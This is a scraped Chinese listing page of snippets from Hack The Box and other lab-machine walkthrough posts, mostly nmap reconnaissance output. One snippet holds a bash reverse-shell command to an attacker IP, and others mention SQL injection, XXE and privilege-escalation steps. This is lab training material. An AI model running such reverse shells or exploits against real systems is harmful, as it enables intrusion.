E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
HTB靶机实战
HTB
-CozyHosting
目标靶机的IP地址为10.10.11.230,下面测试连接的稳定性!攻击机的IP地址为10.10.14.67!有一点点慢,应该是问题不大!信息收集#nmap-sT--min-rate10000-p-10.10.11.230-oNport.nmapStartingNmap7.94(https://nmap.org)at2024-02-1517:36CSTWarning:10.10.11.230giv
Y4y17
·
2024-02-20 18:28
HackTheBox
网络安全
安全
学习
web安全
安全威胁分析
HTB
-Analytics
靶机的IP地址为10.10.11.233,攻击机的IP地址为10.10.16.30信息收集#nmap-sT--min-rate10000-p-10.10.11.233-oNport.nmapStartingNmap7.94(https://nmap.org)at2024-02-1914:50CSTWarning:10.10.11.233givinguponportbecauseretransmis
Y4y17
·
2024-02-20 18:26
HackTheBox
网络安全
学习
安全威胁分析
web安全
安全
CFS三层靶机
三层内网靶场渗透记录【详细指南】-FreeBuf网络安全行业门户CFS三层靶机搭建及其内网渗透【附靶场环境】|TeamsSixCFS三层网络环境靶场实战-PANDA墨森-博客园(cnblogs.com)CFS三层
靶机实战
0e1G7
·
2024-02-15 10:55
渗透笔记
服务器
linux
运维
入坑 Hack The Box
目录介绍HackingTheBox(
HTB
)vsVulnHub注册使用1:直接连接windows连接
htb
1.下载安装OpenVPN2.获取VPN配置文件3.导入配置文件4.连接VPN5.验证可行性linux
lainwith
·
2024-02-09 17:46
靶机
htb
Hackthebox Shoppy攻略
一、信息收集1、端口扫描发现两个端口:22、80;其中80端口扫描后发现其重定向至域名http://shoppy.
htb
我们将域名添加至/etc/hosts中,使kali可以解析。
bruce121385
·
2024-02-09 17:46
web安全
安全
网络安全
系统安全
[原创]夺棋赛HackTheBox OpenSource攻略
简介HackTheBox(缩写
HTB
),
HTB
是一个网络安全攻防竞技场,全球的顶尖高手很多在上面,有人在上面出题(防守),就有人解题(攻击)。想提高网络攻防水平就来玩这个game平台。
huandaohack
·
2024-02-09 17:45
安全
安全
web安全
网络
HTB
Monitored
MonitoreduserNmap┌──(kali㉿kali)-[~]└─$nmap-A10.10.11.248StartingNmap7.80(https://nmap.org)at2024-01-1423:42CSTStats:0:00:15elapsed;0hostscompleted(1up),1undergoingConnectS
Som3B0dy
·
2024-02-08 00:19
HackTheBox
网络安全
HTB
Pov
PovUserNmap┌──(kali㉿kali)-[~/freeAv]└─$nmap-A10.10.11.251StartingNm
Som3B0dy
·
2024-02-08 00:19
HackTheBox
网络安全
HTB
Analysis
Analysisusernmap➜~nmap-A10.10.11.250StartingNmap7.80(https://nmap.org)at2024-01-2321:57CSTNmapscanreportforlocalhost(10.10.11.250)Hostisup(0.14slatency).Notshown:987closedportsPORTSTATESERVICEVERSION5
Som3B0dy
·
2024-02-08 00:17
HackTheBox
网络安全
php
(给盲注戴上眼镜)
靶机实战
利用Ecshop 2.x/3.x SQL注入/任意代码执行漏洞
(给盲注戴上眼镜)
靶机实战
利用Ecshop2.x/3.xSQL注入/任意代码执行漏洞。工具简介:平常的漏洞检测或漏洞利用需要进一步的用户或系统交互。但是一些漏洞类型没有直接表明攻击是成功的。
代码讲故事
·
2024-02-05 13:30
Hacker技术提升基地
sql
数据库
WAF
payload
靶机
sql注入
执行漏洞
靶机实战
bwapp亲测xxe漏洞攻击及自动化XXE注射工具分析利用
靶机实战
bwapp亲测xxe漏洞攻击及自动化XXE注射工具分析利用。
代码讲故事
·
2024-02-05 12:46
Hacker技术提升基地
黑客
靶机
攻击
漏洞
自动注入
XXE
bwapp
HTB
-AdmirerToo
第一步:nmap扫描nmap-Pn-sF-sV-sC-A10.10.11.137-Pn:不进行ping扫描-sF:探测防火墙状态-sV:探测开放端口以确定服务/版本信息-A:选项用于使用进攻性方式扫描-sC:使用-sC或-A选项拦描时候默认的脚本,提供基本脚本扫描能力看到端口80已打开,用dirsearch枚举web应用程序python3dirsearch.py-uhttp://10.10.11.
H0ne
·
2024-02-04 07:08
安全
linux
Hack The Box-Pov
nmap对主机进行端口扫描nmap10.10.11.251只开放了80端口访问网站后发现没有什么功能点,尝试目录扫描并没有什么能够利用的点使用gobuster进行子域名扫描gobusterdns-dpov.
htb
-w
0415i
·
2024-02-02 21:07
HTB靶场合集
hackthebox
Windows
.NET
提权
Hack The Box-Analysis
协议相关漏洞enum4linux-l10.10.11.250能扫描出域名为analysis,将域名加入到hosts文件中,并作为自定义DNS服务器后获取一些子域gobusterdns-danalysis.
htb
-w
0415i
·
2024-02-02 21:36
HTB靶场合集
网络
web
windows
msfconsole
evil_winrm
reg
2021-02-23
HTB
Laboratory Walkthrough
10.10.10.216信息搜集端口扫描nmap443端口扫描到两个网站,分别是https://laboratory.htbhttps://git.laboratory.htbhttps://laboratory.
htb
ev3rrr
·
2024-01-28 03:55
Linux/Academy
Enumerationnmap首先扫描目标端口对外开放情况nmap-p-10.10.10.215-T4发现对外开放了22,80,33060三个端口,端口详细信息如下结果显示80端口运行着http,且给出了域名academy.
htb
ve9etable
·
2024-01-26 02:56
HackTheBox
网络安全
web安全
Linux/Tabby
已知目标开放了22,80,8080端口,扫描详细情况如下TCP/80显示80和8080分别是Apache和Tomcat,而22是ssh,Apache页面如下页面上有些链接指向http://megahosting.
htb
ve9etable
·
2024-01-26 02:55
HackTheBox
网络安全
web安全
Linux/Doctor
Enumerationnmap已知目标开放了22,80,8089端口,扫描详细情况如下可以看到对外开放了22,80,8089三个端口TCP/80SSTI访问80端口,有一个info@doctors.
htb
ve9etable
·
2024-01-26 02:53
HackTheBox
网络安全
web安全
【
HTB
】Horizontal(vhost爆破,chisel隧道)
免责声明本文渗透的主机经过合法授权。本文使用的工具和方法仅限学习交流使用,请不要将文中使用的工具和渗透思路用于任何非法用途,对此产生的一切后果,本人不承担任何责任,也不对造成的任何误用或损害负责。服务探测┌──(rootkali)-[~]└─#nmap-sV-Pn10.10.11.105Hostdiscoverydisabled(-Pn).Alladdresseswillbemarked'up'a
天线锅仔
·
2024-01-24 03:24
Hack The Box - TIER 0 - Meow Fawn Dancing
实战有点难,代码审计有师傅建议先别搞,那刷刷
HTB
也不错,多方好评。Meow看新手入门连接到
HTB
的靶机过后,就打开了第一个,好像前面不做也只能打开第一个。
Tajang
·
2024-01-22 08:00
Hack
The
Box
web安全
渗透测试
htb
(二)
Oopsieproxy发现不是这里可以看到有个login尝试发现是/cdn-cgi/login发现需要adminCookie将id修改为134322记得之前扫到的/uploads目录db.php/bin/bash-c'bash-i&>/dev/tcp/10.10.14.217/55550catchmod+xcataf13b0bee69f8a877c3faf667f7beacfVaccineftpa
wanan0red
·
2024-01-22 00:30
php
linux
bash
HTB
Napper WriteUp
Napper2023年11月12日14:58:35UserNmap➜Nappernmap-sCV-A-p-10.10.11.240--min-rate10000StartingNmap
Som3B0dy
·
2024-01-22 00:30
HackTheBox
网络安全
htb
Analysis wp
施工中StartingNmap7.94(https://nmap.org)at2024-01-2023:15ESTNmapscanreportfor10.129.7.235Hostisup(0.47slatency).PORTSTATESERVICEVERSION53/tcpopendomainSimpleDNSPlus80/tcpopenhttpMicrosoftHTTPAPIhttpd2.0(
春猿火
·
2024-01-22 00:56
安全
[
HTB
][Sherlocks] Meerkat
作为一家快速发展的初创公司,Forela一直在利用商业管理平台。不幸的是,我们的文档很少,而且我们的管理员也不是最有安全意识的。作为我们的新安全提供商,我们希望您查看我们导出的一些PCAP和日志数据,以确认我们是否已经(或没有)被泄露。TASK1题目:我们认为我们的业务管理平台服务器已被破坏。请确认正在运行的应用程序的名称?打开分析,端点进行数据分析172为内网地址,根据题目意思,那么商业管理平台
Мартин.
·
2024-01-20 08:34
HackTheBox
网络
安全
【
HTB
-Sherlocks-OpTinselTrace-3 WP 应急响应-内存取证】
连接:HackTheBox文件下载解压后是一个内存文件santaclaus.bin,使用vol3去进行内存取证,因为该内存镜像是win10版本的1.Whatisthenameofthefilethatislikelycopiedfromthesharedfolder(includingthefileextension)?【可能从共享文件夹复制的文件的名称是什么(包括文件扩展名)?】使用命令vol.
Asymptote_tanaka
·
2024-01-20 08:29
网络安全-应急
网络安全
【Sherlocks圣诞节特辑】
htb
OpTinselTrace-3 wp
TASK1Whatisthenameofthefilethatislikelycopiedfromthesharedfolder(includingthefileextension)?可能从共享文件夹复制的文件的名称是什么(包括文件扩展名)?TASK2Whatisthefilenameusedtotriggertheattack(includingthefileextension)?用于触发攻击的
春猿火
·
2024-01-19 23:53
linux
安全
【Sherlocks圣诞节特辑】
htb
OpTinselTrace-4 wp
TASK1Theperformanceofthenetworkprinterserverhasbecomesluggish,causinginterruptionsintheworkflowattheNorthPoleworkshop.Santahasdirectedustogenerateasupportrequestandexaminethenetworkdatatopinpointtheso
春猿火
·
2024-01-19 23:53
php
开发语言
htb
snoopy wp记录
这个破靶机难度不高但是也不低…考的东西蛮多,卡在主页太久了,收集完信息后一直太多时间浪费在fuzz首页的download接口,感谢hxd发现afr有路径过滤,要不这靶机彻底卡这了。惯例nmap扫一下无视22,看到开了53和80,看到53是起了dns的,话不多说直接把自己的dns指向他再接着看webng的1.18应该…这个靶机能用的上的漏洞我是真没找到1.首页有两个here看眼源码第一个对应http
春猿火
·
2024-01-19 23:52
安全
网络
服务器
git
【Sherlocks圣诞节特辑】
htb
OpTinselTrace-2 wp
圣诞系列5台的文件信息是复用的,这里先更一下OpTinselTrace-2,OpTinselTrace-1会这周内更新。task1WhatistheMD5sumofthebinarytheThreatActorfoundtheS3bucketlocationin?aws的bucket里的二进制程序md5task2WhattimedidtheThreatActorbegintheirautomate
春猿火
·
2024-01-19 23:52
安全
aws
htb
monitorstwo wp记录
哼哼啊啊啊啊好久没打靶了身体不太gud,今儿久违的打一个直接开冲个上周的ez靶机上来梭哈nmap扫一扫└─$sudonmap-sS10.10.11.211-p--sC--min-rate=10000StartingNmap7.93(https://nmap.org)at2023-05-0804:02-0930Warning:10.10.11.211givinguponportbecauseretr
春猿火
·
2024-01-19 23:22
php
系统安全
docker
htb
jupiter root简记 wp
简单说一下还是这个东西,直接执行会提示缺少配置文件搜下关键字看看有没有关联的这里出来个绝对路径的怀疑是他的目标配置写个json丢这,然后根据他的报错疯狂fuzz,报错缺什么就加什么然后我倒在了这里,他说有一组数组,但是没给变量名它既然能跑就肯定会有现成的config,于是搜了下软件名,在share下找到个目录如果没有这个config的话我就得直接拆包了重点是"tleroot":"/tmp/tle/
春猿火
·
2024-01-19 23:22
系统安全
htb
Sandworm wp
nmap有域名ssa.
htb
加到hosts看web爆dns和域名点到contact里面有个guide可以点点进去之后web如下从上往下依次是;测试解密密文测试公钥加密生成密文你的公钥信息和签名这边他会给你一个测试用的
春猿火
·
2024-01-19 23:22
linux
rust
安全
htb
codify root 脚本
?填充方式importsubprocessimportstringpd=[]s=string.printabledefreco(jp):re=subprocess.run(f'echo{jp}|sudo./aha.sh',shell=True,stdout=subprocess.PIPE,text=True)returnre.stdoutwhileTrue:rei=reco(''.join(pd)
春猿火
·
2024-01-19 23:22
python
linux
开发语言
htb
monitored root方式其中的一种(仅作记录)
快下班时候审出来的,目前root的第5种方式nagios@monitored:~$cat/usr/local/nagiosxi/scripts/backup_xi.sh#!/bin/bash##CreatesaFullBackupofNagiosXI#Copyright(c)2011-2020NagiosEnterprises,LLC.Allrightsreserved.#BASEDIR=$(di
春猿火
·
2024-01-19 23:20
linux
【
HTB
】ServMon(目录遍历,chisel隧道,普通用户提权至管理员组)
服务探测┌──(rootkali)-[~/
htb
/ServMon]└─#nmap-sV-Pn10.10.10.184-p-Hostdiscoverydisabled(-Pn).Alladdresseswi
天线锅仔
·
2024-01-17 06:27
[渗透测试学习] Surveillance -HackTheBox
getshell提权信息搜集nmap扫描端口nmap-sV-sC-v-p---min-rate100010.10.11.245扫出来两个端口,其中80端口有http服务并且重定向到surveillance.
htb
_rev1ve
·
2024-01-14 23:52
学习
网络
安全
web安全
Linux/Frolic
Enumerationnmap还是扫描系统对外开放的端口情况,对外开放了22,139,445,还有9999端口,显示是http服务,使用了nginx1.10.3┌──(kali㉿kali)-[~/
HTB
ve9etable
·
2024-01-14 11:39
HackTheBox
网络
数据库
web安全
网络安全
linux
HTB
- PC
靶机描述ip:10.10.11.214在做之前需要配置一下hosts文件,不然会连接失败(windows的hosts文件在C:\Windows\System32\drivers\etc里,linux在/etc/hosts)信息收集nmap扫描开启了22端口ssh服务和50051端口单独在仔细扫一遍50051端口继续搜集信息,搜索了一下50051是什么服务发现50051是gRPC的默认端口继续搜索怎
怪兽不会rap_哥哥我会crash
·
2024-01-14 10:44
HTB
安全
web安全
数据库
sql
HTB
靶场-Sau
本人自己的打靶记录,会有错误的地方,尽情谅解,欢迎指出错误和不解的地方,让我们共同进步!信息收集端口扫描nmap-sV10.10.11.22422,80,55555端口开放,80端口访问不了,但是55555端口有web服务通过页面显示RequestBaskets1.2.1版本RequestBaskets是rbaskets开源的一个Web服务搜索发现有一个SSRF漏洞(CVE-2023-27163)
hang0c
·
2024-01-14 10:44
打靶
网络安全
web安全
linux
HTB
-sau Walkthrough
原文:个人主页原文运行环境:macOS13.2.1;ParallelDesktop:KaliLinux2022.2ARM64;Windows11靶机链接:https://app.hackthebox.com/machines/Sau过程信息收集基础的四项扫描:在端口扫描时,采用默认的-sS方式,能够扫到-sT方式扫不到的80和8338端口:扫描完成后,进行子目录爆破:Web部分进入hostname
yunsaijc
·
2024-01-14 10:43
靶机Walkthrough
安全
HTB
Sau Maltraill-v0.53 CVE-2021-3560
htb
|sau使用nmap扫描端口nmap-sV-sC-v-oNSau10.10.11.224#Nmap7.93scaninitiatedMonDec2508:56:252023as:nmap-sV-sC-v-oNSau10.10.11.224Nmapscanreportfor10.10.11.224Hostisup
强少张
·
2024-01-14 10:12
安全
web安全
网络安全
系统安全
网络攻击模型
HTB
PC
HTBPC链接:https://qing3feng.github.io/2023/05/29/
HTB
%20PC/今天又学一招,配置好/etc/hosts文件:[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传如图所示
清风--
·
2024-01-14 10:12
打靶
安全
web安全
HTB
靶场系列 linux靶机 Tartarsause靶机
勘探nmap直接扫root@kali:~/hackthebox/tartarsauce-10.10.10.88#nmap10.10.10.88StartingNmap7.70(https://nmap.org)at2018-05-2212:21EDTWarning:10.10.10.88givinguponportbecauseretransmissioncaphit(10).Nmapscanre
万天峰
·
2024-01-14 10:12
linux
服务器
运维
HTB
-SAU
信息收集#catport.nmap#Nmap7.94scaninitiatedThuJan1119:26:512024as:nmap-sS--min-rate10000-p--oNport.nmap10.10.11.224Nmapscanreportfor10.10.11.224(10.10.11.224)Hostisup(0.28slatency).Notshown:65531closedtcp
YAy17
·
2024-01-14 10:08
HackTheBox
安全
学习
网络安全
web安全
安全威胁分析
HackTheBox-Keeper
10.10.11.227开放端口为22和80端口服务版本和操作系统信息探测:nmap-sV-sC-O-p22,8010.10.11.227Nmapscanreportfortickets.keeper.
htb
YAy17
·
2024-01-13 01:11
HackTheBox
安全
web安全
网络
网络安全
学习
靶机实战
(5):OSCP备考之VulnHub SUNSET DECOY
靶机官网:SUNSET:DECOY[1]实战思路:主机发现端口发现(服务、组件、版本)1漏洞发现(获取权限)222端口/SSH服务2组件漏洞2口令漏洞280端口/HTTP服务2组件漏洞2URL漏洞(目录、文件)3越权提权601、sudo602、suid03、信息收集704、tty905、sudo906、suid07、信息收集1108、chkrootkit一、主机发现本次攻击指定IP,不涉及主机发现
OneMoreThink
·
2024-01-12 23:46
网络
安全
服务器
运维
靶机实战
(4):Funbox: Rookie
靶机官方:Funbox:Rookie[1]实战思路:一、主机发现二、端口发现(服务、组件、版本)三、漏洞发现(获取权限)21端口/FTP服务组件漏洞口令漏洞422端口/SSH服务9组件漏洞9口令漏洞10口令泄露1080端口/HTTP服务11组件漏洞11URL漏洞(目录、文件)12四、越权提权15sudo15suid15信息收集18sudo一、主机发现本次攻击指定IP,不涉及主机发现过程。二、端口发
OneMoreThink
·
2024-01-12 23:45
安全
网络
web安全
服务器
运维
靶机实战
(9):OSCP备考之VulnHub BTRSys v2.1
靶机官网:BTRSys:v2.1[1]实战思路:一、主机发现二、端口发现(服务、组件、版本)三、漏洞发现(获取权限)21端口/FTP服务组件漏洞口令漏洞22端口/SSH服务组件漏洞口令漏洞80端口/HTTP服务组件漏洞URL漏洞(目录、文件)四、提升权限www-data用户sudosuidcron内核提权信息收集btrisk用户sudo一、主机发现本次攻击指定IP,不涉及主机发现过程。二、端口发现
OneMoreThink
·
2024-01-12 19:12
安全
网络
靶机实战
(10):OSCP备考之VulnHub Tre 1
靶机官网:Tre:1[1]实战思路:一、主机发现二、端口发现(服务、组件、版本)三、漏洞发现(获取权限)8082端口/HTTP服务组件漏洞URL漏洞(目录、文件)80端口/HTTP服务组件漏洞URL漏洞(目录、文件)22端口/SSH服务组件漏洞口令漏洞80端口/HTTP服务URL漏洞(目录、文件)四、提升权限tre用户sudosuidcron后记一、主机发现本次攻击指定IP,不涉及主机发现过程。二
OneMoreThink
·
2024-01-12 11:12
HTB
靶机:RainyDay
目录介绍主机信息探测网站探测子域名爆破(BurpSuite)目录爆破爆破参数值分析&破解hash登录系统反弹shell端口转发内网穿透【很坑】配置socks代理内网扫描换用windows做内网渗透子域名信息收集爆破密钥位置爆破密钥内容JWT攻击进程监控Flag1&获取SSH私钥提权python沙盒逃逸&提权为jack_adm破解hash参考介绍系统:linux难度:困难发布日期:2022/10/1
lainwith
·
2024-01-07 19:28
靶机
htb
上一页
1
2
3
4
5
6
7
8
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他